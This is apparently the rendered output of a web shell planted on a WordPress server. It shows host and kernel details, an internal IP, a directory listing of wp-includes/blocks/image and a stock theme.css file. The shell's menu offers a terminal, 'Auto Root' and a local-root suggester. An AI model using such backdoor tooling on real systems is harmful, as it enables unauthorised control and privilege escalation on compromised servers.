Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
wp-includes /
blocks /
image /
Delete
Unzip
Name
Size
Permission
Date
Action
block.json
3.14
KB
-rw-r--r--
2026-08-20 16:07
editor-rtl.css
4.93
KB
-rw-r--r--
2026-08-20 16:07
editor-rtl.min.css
2.55
KB
-rw-r--r--
2026-08-20 16:07
editor.css
4.93
KB
-rw-r--r--
2026-08-20 16:07
editor.min.css
2.55
KB
-rw-r--r--
2026-08-20 16:07
style-rtl.css
12.19
KB
-rw-r--r--
2026-08-20 16:07
style-rtl.min.css
8.61
KB
-rw-r--r--
2026-08-20 16:07
style.css
12.28
KB
-rw-r--r--
2026-08-20 16:07
style.min.css
8.6
KB
-rw-r--r--
2026-08-20 16:07
theme-rtl.css
2.13
KB
-rw-r--r--
2026-08-20 16:07
theme-rtl.min.css
198
B
-rw-r--r--
2026-08-20 16:07
theme.css
2.13
KB
-rw-r--r--
2026-08-20 16:07
theme.min.css
198
B
-rw-r--r--
2026-08-20 16:07
Save
Rename
/** * Typography */ /** * SCSS Variables. * * Please use variables from this sheet to ensure consistency across the UI. * Don't add to this sheet unless you're pretty sure the value will be reused in many places. * For example, don't add rules to this sheet that affect block visuals. It's purely for UI. */ /** * Colors */ /** * Fonts & basic variables. */ /** * Typography */ /** * Grid System. * https://make.wordpress.org/design/2019/10/31/proposal-a-consistent-spacing-system-for-wordpress/ */ /** * Radius scale. */ /** * Elevation scale. */ /** * Dimensions. */ /** * Mobile specific styles */ /** * Editor styles. */ /** * Block & Editor UI. */ /** * Block paddings. */ /** * React Native specific. * These variables do not appear to be used anywhere else. */ /** * Breakpoints & Media Queries */ /** * Converts a hex value into the rgb equivalent. * * @param {string} hex - the hexadecimal value to convert * @return {string} comma separated rgb values */ /** * Long content fade mixin * * Creates a fading overlay to signify that the content is longer * than the space allows. */ /** * Breakpoint mixins */ /** * Focus styles. */ /** * Standard focus rings for the WordPress Design System. * * Apply `outset-ring__focus` inside the relevant pseudo-class at the call site, * e.g. `&:focus { @include outset-ring__focus(); }`. */ /** * Applies editor left position to the selector passed as argument */ /** * Styles that are reused verbatim in a few places */ /** * Allows users to opt-out of animations via OS-level preferences. */ /** * Reset default styles for JavaScript UI based pages. * This is a WP-admin agnostic reset */ /** * Reset the WP Admin page styles for Gutenberg-like pages. */ /** * Creates a checkerboard pattern background to indicate transparency. * @param {String} $size - The size of the squares in the checkerboard pattern. Default is 12px. */ :root :where(.wp-block-image figcaption) { color: #555; font-size: 13px; text-align: center; } .is-dark-theme :root :where(.wp-block-image figcaption) { color: rgba(255, 255, 255, 0.65); } .wp-block-image { margin: 0 0 1em 0; }